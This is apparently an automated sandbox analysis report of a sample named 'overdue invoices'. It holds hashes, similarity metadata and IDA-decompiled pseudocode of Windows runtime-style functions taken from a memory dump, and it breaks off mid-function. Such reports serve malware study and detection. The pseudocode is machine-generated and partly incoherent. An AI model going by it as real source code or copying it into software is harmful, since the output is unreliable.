                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                  • Instruction ID: 73c9627b7f85bc0b4af4003efcf2d35ced423f47c8e13bf59d7b80f57f5df09c
                  • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                  • Instruction Fuzzy Hash: 2A110272904208BBC7019F5C98819BEF7B9EFD9310F10806AF9448B351DA318D51D3A4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 009C2397 Relevance: .1, Instructions: 59COMMON
                  Download Yara Rule
                  C-Code - Quality: 34%
                  			E009C2397(intOrPtr _a4) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				void* _t19;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				void* _t28;
				void* _t29;

				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
				if( *0xa8848c != 0) {
					L009BFAD0(0xa88610);
					if( *0xa8848c == 0) {
						E009BFA00(0xa88610, _t19, _t27, 0xa88610);
						goto L1;
					} else {
						_push(0);
						_push(_a4);
						_t26 = 4;
						_t29 = E009C2581(0xa88610, 0x9750a0, _t26, _t27, _t28);
						E009BFA00(0xa88610, 0x9750a0, _t27, 0xa88610);
					}
				} else {
					L1:
					_t11 =  *0xa88614; // 0x0
					if(_t11 == 0) {
						_t11 = E009D4886(0x971088, 1, 0xa88614);
					}
					_push(0);
					_push(_a4);
					_t25 = 4;
					_t29 = E009C2581(0xa88610, (_t11 << 4) + 0x975070, _t25, _t27, _t28);
				}
				if(_t29 != 0) {
					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
					 *((char*)(_t29 + 0x40)) = 0;
				}
				return _t29;
			}















                  0x009c23b0
                  0x009c23b6
                  0x009c2409
                  0x009c2415
                  0x00a05ae9
                  0x00000000
                  0x009c241b
                  0x009c241b
                  0x009c241d
                  0x009c2427
                  0x009c242e
                  0x009c2430
                  0x009c2430
                  0x009c23b8
                  0x009c23b8
                  0x009c23b8
                  0x009c23bf
                  0x009c23fc
                  0x009c23fc
                  0x009c23c1
                  0x009c23c3
                  0x009c23d0
                  0x009c23d8
                  0x009c23d8
                  0x009c23dc
                  0x009c23de
                  0x009c23e1
                  0x009c23e1
                  0x009c23ec

                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 19df11f808db092e864a5c8fc01592f657097254ac68ba21f3b7635886bb1959
                  • Instruction ID: 98f80c688aa5002264860bc269ae73cd0fb920e4d3dced70093cfa44038de6f9
                  • Opcode Fuzzy Hash: 19df11f808db092e864a5c8fc01592f657097254ac68ba21f3b7635886bb1959
                  • Instruction Fuzzy Hash: 83112B32B4034067D734A73DAC91F16B2CDBB90B60F54843AF50AA7291DDBCD8418755
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0099C962 Relevance: .1, Instructions: 57COMMON
                  Download Yara Rule
                  C-Code - Quality: 42%
                  			E0099C962(char __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t19;
				char _t22;
				void* _t26;
				void* _t27;
				char _t32;
				char _t34;
				void* _t35;
				void* _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0xa8d360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					E009AEEF0(0xa870a0);
					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(E00A1F625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E009AEB70(_t29, 0xa870a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return L009DB640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E00A1F1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0xa870c0; // 0x0
					while(_t38 != 0xa870c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0xa8b1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}


















                  0x0099c96a
                  0x0099c974
                  0x0099c988
                  0x0099c98a
                  0x00a07c9d
                  0x00a07c9f
                  0x00a07ca4
                  0x00a07cae
                  0x00a07cf0
                  0x00a07cf5
                  0x00a07cfa
                  0x0099c992
                  0x0099c996
                  0x0099c997
                  0x0099c998
                  0x0099c9a3
                  0x0099c9a3
                  0x00a07cb0
                  0x00a07cb7
                  0x00a07cbb
                  0x00000000
                  0x00000000
                  0x00a07cbd
                  0x00a07ce8
                  0x00a07cc5
                  0x00a07cc8
                  0x00a07cca
                  0x00a07cd0
                  0x00a07cd6
                  0x00a07cde
                  0x00a07ce4
                  0x00a07ce4
                  0x00a07cd0
                  0x00000000
                  0x00a07ce8
                  0x0099c990
                  0x00000000

                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f7b2093a9a3ff91fa7337104c088567cb6a3f5e9a79bb0e0ba469380b463437a
                  • Instruction ID: c47e8e99d1116def1ad3b61eb441eaa80a16754d5ba97e01f96ae031cfc6aab1
                  • Opcode Fuzzy Hash: f7b2093a9a3ff91fa7337104c088567cb6a3f5e9a79bb0e0ba469380b463437a
                  • Instruction Fuzzy Hash: AE11CE3170864AABD710AF68EC96A6EB7B5BB84714B200539F851876A2DB30FC50C7D1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 009C002D Relevance: .1, Instructions: 55COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E009C002D() {
				void* _t11;
				char* _t14;
				signed char* _t16;
				char* _t27;
				signed char* _t29;

				_t11 = E009B7D50();
				_t27 = 0x7ffe0384;
				if(_t11 != 0) {
					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t14 = 0x7ffe0384;
				}
				_t29 = 0x7ffe0385;
				if( *_t14 != 0) {
					if(E009B7D50() == 0) {
						_t16 = 0x7ffe0385;
					} else {
						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t16 & 0x00000040) != 0) {
						goto L18;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(E009B7D50() != 0) {
						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					if( *_t27 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						if(E009B7D50() != 0) {
							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t29 & 0x00000020) == 0) {
							goto L5;
						}
						L18:
						return 1;
					} else {
						L5:
						return 0;
					}
				}
			}








                  0x009c0032
                  0x009c0037
                  0x009c0043
                  0x00a04b3a
                  0x009c0049
                  0x009c0049
                  0x009c0049
                  0x009c004e
                  0x009c0053
                  0x00a04b48
                  0x00a04b5a
                  0x00a04b4a
                  0x00a04b53
                  0x00a04b53
                  0x00a04b5f
                  0x00000000
                  0x00a04b61
                  0x00000000
                  0x00a04b61
                  0x009c0059
                  0x009c0059
                  0x009c0060
                  0x00a04b6f
                  0x00a04b6f
                  0x009c0069
                  0x00a04b83
                  0x00000000
                  0x00000000
                  0x00a04b90
                  0x00a04b9b
                  0x00a04b9b
                  0x00a04ba4
                  0x00000000
                  0x00000000
                  0x00a04baa
                  0x00000000
                  0x009c006f
                  0x009c006f
                  0x00000000
                  0x009c006f
                  0x009c0069

                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                  • Instruction ID: 960ef8f76d938983b71b3cd30fc0b98389f521726ec199068f82e76b8667fcff
                  • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                  • Instruction Fuzzy Hash: 781104B2A05684CFD722DB68DA44B3577D8FFC6794F1A04A4EE04876D2D32CCC41C261
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00999080 Relevance: .1, Instructions: 53COMMON
                  Download Yara Rule
                  C-Code - Quality: 69%
                  			E00999080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0xa885ec;
				E009B2280(_t48, 0xa885ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return L009AFFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0xa8538c; // 0x77f06828
					if( *_t84 != 0xa85388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0xa6f6e8);
						E009ED0E8(0xa885ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E00A688F5(_t80, _t85, 0xa85388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0xa886c0; // 0x5307b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0xa886b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E009B2280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E00A688F5(0xa885ec, _t85, 0xa85388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												L009DAFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0xa8b1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0xa884c0;
																			if(_t82 >=  *0xa884c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E00A69063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E0099922A(_t99);
										_t64 = E009B7D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E00A68B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0xa886c0; // 0x5307b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0xa886b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0xa886bc;
													_t87 = 0xa886b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E00999240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0xa886c4;
												_t87 = 0xa886c0;
												L27:
												E009C9B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E009ED130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0xa85388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0xa8538c = _t51;
						goto L6;
					}
				}
			}




















                  0x00999082
                  0x00999083
                  0x00999084
                  0x00999085
                  0x00999087
                  0x00999096
                  0x00999098
                  0x00999098
                  0x0099909e
                  0x009990a8
                  0x009990e7
                  0x009990e7
                  0x009990aa
                  0x009990b0
                  0x009990b7
                  0x009990bd
                  0x009990dd
                  0x009990e6
                  0x009990bf
                  0x009990bf
                  0x009990c7
                  0x009990cf
                  0x009990f1
                  0x009990f2
                  0x009990f4
                  0x009990f5
                  0x009990f6
                  0x009990f7
                  0x009990f8
                  0x009990f9
                  0x009990fa
                  0x009990fb
                  0x009990fc
                  0x009990fd
                  0x009990fe
                  0x009990ff
                  0x00999100
                  0x00999102
                  0x00999107
                  0x0099910c
                  0x00999110
                  0x00999113
                  0x00999115
                  0x00999136
                  0x0099913f
                  0x00999143
                  0x009f37e4
                  0x009f37e4
                  0x00999117
                  0x00999117
                  0x0099911d
                  0x00000000
                  0x0099911f
                  0x0099911f
                  0x00999125
                  0x00000000
                  0x00999127
                  0x0099912d
                  0x00999130
                  0x00999134
                  0x00999158
                  0x0099915d
                  0x00999161
                  0x00999168
                  0x009f3715
                  0x0099916e
                  0x0099916e
                  0x00999175
                  0x00999177
                  0x0099917e
                  0x0099917f
                  0x00999182
                  0x00999182
                  0x00999187
                  0x00999187
                  0x0099918a
                  0x0099918d
                  0x0099918f
                  0x00999192
                  0x00999195
                  0x00999198
                  0x00999198
                  0x00999198
                  0x0099919a
                  0x00000000
                  0x00000000
                  0x009f371f
                  0x009f3721
                  0x009f3727
                  0x009f372f
                  0x009f3733
                  0x009f3735
                  0x009f3738
                  0x009f373b
                  0x009f373d
                  0x009f3740
                  0x00000000
                  0x009f3746
                  0x009f3746
                  0x009f3749
                  0x00000000
                  0x009f374f
                  0x009f374f
                  0x009f3751
                  0x009f3757
                  0x009f3759
                  0x009f375c
                  0x009f375c
                  0x009f375e
                  0x009f375e
                  0x009f3761
                  0x009f3764
                  0x00000000
                  0x00000000
                  0x009f3766
                  0x009f3768
                  0x009f37a3
                  0x009f37a3
                  0x009f37a5
                  0x009f37a7
                  0x009f37ad
                  0x009f37b0
                  0x009f37b2
                  0x009f37bc
                  0x009f37c2
                  0x009f37c2
                  0x009f37b2
                  0x00999187
                  0x00999187
                  0x0099918a
                  0x0099918d
                  0x0099918f
                  0x00999192
                  0x00999195
                  0x00000000
                  0x00999195
                  0x00000000
                  0x009f376a
                  0x009f376a
                  0x009f376a
                  0x009f376c
                  0x009f376c
                  0x009f376f
                  0x009f3775
                  0x00000000
                  0x00000000
                  0x009f3777
                  0x009f3779
                  0x009f3782
                  0x009f3787
                  0x009f3789
                  0x009f3790
                  0x009f3790
                  0x009f378b
                  0x009f378b
                  0x009f378b
                  0x009f3792
                  0x009f3795
                  0x00000000
                  0x009f3795
                  0x00000000
                  0x009f3779
                  0x009f3798
                  0x00000000
                  0x009f3798
                  0x00000000
                  0x009f3768
                  0x009f379b
                  0x009f379b
                  0x009f3751
                  0x009f3749
                  0x00000000
                  0x009f3740
                  0x009991a0
                  0x009991a3
                  0x009991a9
                  0x009991b0
                  0x00000000
                  0x009991b0
                  0x00999187
                  0x009991b4
                  0x009991b4
                  0x009991bb
                  0x009991c0
                  0x009991c5
                  0x009991c7
                  0x009f37da
                  0x009991cd
                  0x009991cd
                  0x009991cd
                  0x009991d2
                  0x009991d5
                  0x00999239
                  0x00999239
                  0x009991d7
                  0x009991db
                  0x009991e1
                  0x009991e7
                  0x009991fd
                  0x00999203
                  0x0099921e
                  0x00999223
                  0x00000000
                  0x00999205
                  0x00999205
                  0x00999208
                  0x0099920c
                  0x00999214
                  0x00999214
                  0x0099920c
                  0x009991e9
                  0x009991e9
                  0x009991ee
                  0x009991f3
                  0x009991f3
                  0x009991f3
                  0x009991e7
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00999134
                  0x00999125
                  0x0099911d
                  0x0099914e
                  0x009990d1
                  0x009990d1
                  0x009990d3
                  0x009990d6
                  0x009990d8
                  0x00000000
                  0x009990d8
                  0x009990cf

                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4defea7c12718d8e57c3904e4e127e31dc03613da23f86defe3b91ba934e86c4
                  • Instruction ID: 33a6a8557274fd0a03f6e1f419eb0376789cd01fe93eeeba4645056acacd8149
                  • Opcode Fuzzy Hash: 4defea7c12718d8e57c3904e4e127e31dc03613da23f86defe3b91ba934e86c4
                  • Instruction Fuzzy Hash: 7601AF72A016048FC7299F5CD854B12BBA9EF96321F25407AE5258F6A1C774DC41CB90
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00A2C450 Relevance: .1, Instructions: 53COMMON
                  Download Yara Rule
                  C-Code - Quality: 46%
                  			E00A2C450(intOrPtr* _a4) {
				signed char _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t26 = _a4;
				_t25 =  *(_t26 + 0x10);
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t26 + 8)));
					_push(0);
					_push( *_t26);
					E009D9910();
					_t25 =  *(_t26 + 0x10);
				}
				if((_t25 & 0x00000001) != 0) {
					_push(4);
					_t7 = _t26 + 4; // 0x4
					_t27 = _t7;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E009D95B0();
					if( *_t27 != 0) {
						_push( *_t27);
						E009D95D0();
					}
				}
				_t8 = _t26 + 0x14; // 0x14
				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
					L009B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
				}
				_push( *_t26);
				E009D95D0();
				return L009B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}






                  0x00a2c458
                  0x00a2c45d
                  0x00a2c466
                  0x00a2c468
                  0x00a2c469
                  0x00a2c46a
                  0x00a2c46b
                  0x00a2c46e
                  0x00a2c46f
                  0x00a2c471
                  0x00a2c476
                  0x00a2c476
                  0x00a2c47c
                  0x00a2c47e
                  0x00a2c480
                  0x00a2c480
                  0x00a2c483
                  0x00a2c484
                  0x00a2c486
                  0x00a2c488
                  0x00a2c48f
                  0x00a2c491
                  0x00a2c493
                  0x00a2c493
                  0x00a2c48f
                  0x00a2c498
                  0x00a2c49e
                  0x00a2c4ad
                  0x00a2c4ad
                  0x00a2c4b2
                  0x00a2c4b4
                  0x00a2c4cd

                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                  • Instruction ID: 8075b4de6649acdf36d179d656bd063b607aa85d9b63923f201baa0bfb1fc49e
                  • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                  • Instruction Fuzzy Hash: 6A01D272180515BFD721BF69DD95FA7F76DFF843A0F008635F10446661CB21ACA0CAA0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00A64015 Relevance: .0, Instructions: 49COMMON
                  Download Yara Rule
                  C-Code - Quality: 86%
                  			E00A64015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E009B2280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E009B2280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0xa886ac);
					E0099F900(0xa886d4, _t28);
					L009AFFB0(0xa886ac, _t28, 0xa886ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					L009AFFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L009B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L009B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}







                  0x00a6401a
                  0x00a6401e
                  0x00a64023
                  0x00a64028
                  0x00a64029
                  0x00a6402b
                  0x00a6402f
                  0x00a64043
                  0x00a64046
                  0x00a64051
                  0x00a64057
                  0x00a6405f
                  0x00a64062
                  0x00a64067
                  0x00a6406f
                  0x00a6407c
                  0x00a6407c
                  0x00a6408c
                  0x00a6408c
                  0x00a64097

                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: cd7d57b7747cb20c9480ecc83387df884d3ceab7dd9f646ac0e3fb328a152eb8
                  • Instruction ID: 519fc9df303d26fe3c00ad225d2f5ce268887d2fdbc6ba93cec754ee51f3358c
                  • Opcode Fuzzy Hash: cd7d57b7747cb20c9480ecc83387df884d3ceab7dd9f646ac0e3fb328a152eb8
                  • Instruction Fuzzy Hash: 74018F722419457FC615ABA9CE85F53FBACFF89760B000625B508C7A12DF28EC11C6E4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00A514FB Relevance: .0, Instructions: 48COMMON
                  Download Yara Rule
                  C-Code - Quality: 79%
                  			E00A514FB(void* __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				void* _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0xa8d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E009DFA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1034;
				if(E009B7D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				return L009DB640(E009D9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34,  *_t21 & 0x000000ff);
			}

















                  0x00a514fb
                  0x00a514fb
                  0x00a5150a
                  0x00a51514
                  0x00a51519
                  0x00a5151b
                  0x00a51526
                  0x00a5152c
                  0x00a51534
                  0x00a51537
                  0x00a5153a
                  0x00a51545
                  0x00a51557
                  0x00a51547
                  0x00a51550
                  0x00a51550
                  0x00a51562
                  0x00a51563
                  0x00a51565
                  0x00a5157f

                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3ff36aac6df43d0dc059da7315f016be0f73835566dfc42e2e4af48b94e5da8c
                  • Instruction ID: fc505137fc230180a7c1c9acb43923c7995d6e50741b3472213a4429b3e106ad
                  • Opcode Fuzzy Hash: 3ff36aac6df43d0dc059da7315f016be0f73835566dfc42e2e4af48b94e5da8c
                  • Instruction Fuzzy Hash: E101B571A01258AFCB00EFA8D842FAEB7B8EF84710F404066F905EB381E670DE00CB94
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00A5138A Relevance: .0, Instructions: 48COMMON
                  Download Yara Rule
                  C-Code - Quality: 79%
                  			E00A5138A(void* __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				void* _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0xa8d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E009DFA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E009B7D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
